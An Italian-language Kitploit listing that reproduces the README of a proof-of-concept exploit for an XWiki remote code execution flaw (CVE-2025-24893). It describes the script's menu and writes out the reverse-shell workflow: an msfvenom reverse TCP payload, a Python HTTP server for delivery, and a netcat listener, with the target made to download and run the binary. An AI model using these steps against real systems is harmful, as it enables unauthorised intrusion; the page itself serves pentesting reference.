Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24893 — Il PoC sfrutta CVE-2025-24893, una vulnerabilità di esecuzione di codice remoto (RCE) in XWiki causata da un sandboxing improprio nelle macro Groovy renderizzate in modo asincrono. Consente l'esecuzione arbitraria di comandi tramite injection negli endpoint SolrSearch basati su RSS. | Kitploit
Strumenti/GitHubGitHub/infinit3i/cve-2025-24893
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebCommand and Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Sito web
6111 mesi faNon ancora revisionato

Il PoC sfrutta CVE-2025-24893, una vulnerabilità di esecuzione di codice remoto (RCE) in XWiki causata da un sandboxing improprio nelle macro Groovy renderizzate in modo asincrono. Consente l'esecuzione arbitraria di comandi tramite injection negli endpoint SolrSearch basati su RSS.

Condividi

XWiki CVE-2025-24893 Prova di concetto

Autori: Net.Doge & Infinit3i


Immagine CVE-2025-24893



Segui su Twitter


Questo script Python sfrutta CVE-2025-24893, una vulnerabilità di esecuzione remota di codice (RCE) in XWiki causata da un sandboxing improprio nelle macro Groovy renderizzate in modo asincrono. Consente l'esecuzione arbitraria di comandi tramite l'iniezione negli endpoint SolrSearch basati su RSS.

📌 Caratteristiche

  • Esecuzione di un singolo comando tramite iniezione Groovy
  • Generazione automatica del payload reverse shell (con msfvenom)
  • Opzione per personalizzare:
    • Target remoto
    • Indirizzo IP locale
    • Porta del server HTTP
    • Porta del beacon della reverse shell
  • Anteprime pulite dei payload bash
  • TUI interattiva a colori ANSI

🚀 Utilizzo

  1. Clona o scarica lo script.

  2. Assicurati di avere installato quanto segue:

    • msfvenom di Metasploit
    • Python 3
    • jq (usato nei payload bash)
  3. Esegui lo script:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. Seleziona dal menu:

    • Esegui comando – Esegui qualsiasi comando shell in remoto.
    • Reverse Shell – Genera e distribuisce una reverse shell ELF sul target.
    • Cambia impostazioni – Modifica LHOST, RHOST, la porta del server o la porta del beacon.

🧪 Flusso di lavoro della Reverse Shell

  1. Il payload viene generato:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. Ti verrà chiesto di avviare un server HTTP Python e un listener netcat:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. Lo script invia la seguente sequenza al target:

    • Scaricare il payload
    • Renderlo eseguibile
    • Eseguire il binario

⚠️ Avvertenza

Questo strumento è destinato esclusivamente a scopo educativo e a test autorizzati. L'uso non autorizzato su sistemi di cui non si è proprietari o per i quali non si ha esplicito permesso di test è illegale e non etico.

📄 Riferimenti

  • XWiki
  • MITRE CVE-2025-24893
Scarica lo strumento